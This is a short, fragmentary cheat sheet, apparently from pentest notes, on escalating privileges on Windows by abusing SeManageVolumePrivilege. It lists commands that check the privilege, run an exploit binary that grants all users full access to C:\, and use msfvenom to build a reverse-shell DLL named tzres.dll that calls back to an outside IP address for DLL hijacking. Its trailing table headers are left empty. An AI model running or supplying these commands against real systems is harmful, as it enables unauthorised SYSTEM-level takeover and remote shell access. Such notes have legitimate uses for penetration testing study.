SeManageVolume
# Check permissions
> whoami /priv
Privilege Name Description State
============================= ================================ ========
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
# Run the exploit
> .\SeManageVolumeExploit.exe
# Check volume permissions
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(F) # Full Access# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dllBinary
DLL(s) to Hijack
Drop Location
Last updated